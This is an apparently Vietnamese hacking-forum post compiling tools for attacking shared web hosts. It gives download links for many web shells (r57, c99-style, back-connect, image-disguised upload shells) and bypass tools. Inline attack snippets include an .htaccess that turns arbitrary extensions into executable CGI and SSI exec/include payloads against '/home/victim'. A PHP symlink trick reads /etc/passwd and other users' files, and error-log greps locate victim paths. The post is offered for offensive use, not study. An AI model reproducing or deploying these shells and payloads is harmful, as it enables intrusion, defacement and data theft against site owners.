Tổng hợp tools hacking

Trích dẫn Yun.s2IM;282702

Shell Cgi (cgi.x-zone) khi command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server

    http://www.mediafire.com/?45fsa46y5bdobfa

telnet 1.4

    http://www.mediafire.com/file/25587ndv7y4hy29/1.4.pl

bypass mod sec (base64)

Telnet 1.3

    http://www.mediafire.com/?eayxc5k8utpqeig

.htaccess

    Options +FollowSymLinks +Indexes
    DirectoryIndex default.html
    ## START ##
    Options +ExecCGI
    AddHandler cgi-script cgi pl tg love h4 tgb cbg

    RewriteEngine on
    RewriteRule (.*)\.war$ $1.cgi
    ## END ##
    RemoveHandler .vkl
    AddType application/octet-stream .vkl

~> 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về

Admin Finder (tìm thư mục admin)

    http://www.mediafire.com/?skaysiedncckx4k

cmd.shtml > view source cmd.shtml

   <!--#exec cmd="dir /home/victim/public_html/" -->

cmd.shtml (1.txt là file đã được symljnk) > view source cmd.shtml

  

  <!--#include virtual='1.txt'-->

Bypass ln.zip

    <?php
    chmod('ln',0777);
    system('./ln -s /etc/passwd > 1.txt';
    ?>

hoặc

    ./ln -s /home/victim/public_html/index.php 1.txt

File SymLink.php

    /home/victim/public_html/index.php

Find Path qua error-log : http://victim.com/fuck

    tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
    tail -100 /usr/local/apache/logs/error_log | grep fuck

Shell offline.php?acc ~> get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ

    http://www.mediafire.com/?r19m52itzq71x5z

Backuper.php (Leech code)

    http://www.mediafire.com/?kp1p40fnwc2171k

Shell Unkonw (Brute)

    http://www.mediafire.com/?hvxjzrm1tjgbwmp

Shell images (r57)

    http://www.mediafire.com/?lh0nslgadbsb5ab

Shell images (Webadmin)

    http://www.mediafire.com/?lc6cizbpw5ijoio

Shell Dumper.php (Zip + Restor data)

    http://www.mediafire.com/?9ecl9efdk4mw3hm

Shell images aaa.php.jpg - shell upload

    http://www.mediafire.com/i/?d61ubhb1qw11dst

Shell help.php (upload file + chmod)

    http://www.mediafire.com/?j3u0mx4fj6xfmag

Unzip.php (giải nén các file bị zip)

    http://www.mediafire.com/?1bhs7jmvly3e1b4

Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó

    http://www.mediafire.com/?ims0mlwa9e3yzl1

telnet v1.3 (ko cần htaccess)

    http://www.mediafire.com/?t1uu3cr6h6aag5c

sym-pl.pl (symljnk cgi ko cần htaccess)

    http://www.mediafire.com/?o8fm7bmw90882hq

Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)

    http://www.mediafire.com/?f86f88nfesduuyp

Locus Shell (back connect)

    http://www.mediafire.com/?0vk8v5m8kzcqgvf

perl shell mr.thien (BackConnect)

    http://www.mediafire.com/?qedquldy39ilgn9

Mysqldumper.php (BackConnect)

    http://www.mediafire.com/?ei0anxe4vnsg04f

5.2.9 (BYpass)

    http://www.mediafire.com/?086h5hq21165ubj

dot.pl (tim user+domain)

    http://www.mediafire.com/?gnh3sv8273gp41e

upload.phpl (upload len path)

    http://www.mediafire.com/?cwax1iinx4ogoap

shell.xml (prefix admincp)

    http://www.mediafire.com/?82ht3sd6hpyyq7m

shell ,tạo file symljnk đối với từng version php ,direct , h4ckcity.php
sql deface vbb,wp,mybb sql.php
html shell có thể view file bị permiss html.php

    http://victim.com/html.php?http://ww...file=index.php

shell python.php (chức năng tạo shell cgi,py,bypass,sql wp& jomla,....)

    http://www.mediafire.com/?i43rj8ghhzw8sno

hoặc

    python.py

shell sec4ever .qua mặt anti với code hoàn toàn # c99 & r57

    http://www.mediafire.com/?5mhaacll6pzd9jt

vault.php (editor,webshell,bind)

    http://www.mediafire.com/?a8c889wg81fjk2q

saudi.php (symljnk root ,brute,...)

    http://www.mediafire.com/?0yyyio6fv8h1axr

sa2.0.php(resever,symljnk root,upload)

    http://www.mediafire.com/?9zbsj162ve49kku

madspotshell.php(symlink tung user)

    http://www.mediafire.com/?4csxq5egze6kwcd

r57-vip.php symljnk

    http://www.mediafire.com/?3ydv9h1p8xgpfa7

Sưu tầm !